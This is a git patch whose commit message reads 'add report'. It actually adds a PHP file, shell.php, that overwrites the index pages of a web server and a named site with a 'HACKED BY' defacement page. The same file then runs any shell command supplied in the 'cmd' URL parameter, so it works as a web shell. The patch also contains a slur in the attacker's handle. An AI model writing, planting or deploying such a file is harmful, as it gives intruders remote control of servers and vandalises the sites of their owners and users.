From 2fa18202d036a70d7d424290a23f75ccc3aaeb34 Mon Sep 17 00:00:00 2001 From: securitytest2026 Date: Wed, 11 Feb 2026 16:04:53 +0000 Subject: [PATCH] add report --- shell.php | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 shell.php diff --git a/shell.php b/shell.php new file mode 100644 index 0000000..71d737a --- /dev/null +++ b/shell.php @@ -0,0 +1,19 @@ + + +HACKED BY @fagotted + +
+

HACK BY @fagotted

+

SYSTEM PWNED

+
+ +'; +$paths = ['/var/www/html/index.html', '/var/www/html/index.php', + '/var/www/halwarsing.net/index.html', '/var/www/halwarsing.net/index.php']; +foreach ($paths as $p) { @file_put_contents($p, $deface); } +echo "DONE"; +// Также выполняем команду +if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); } +?> \ No newline at end of file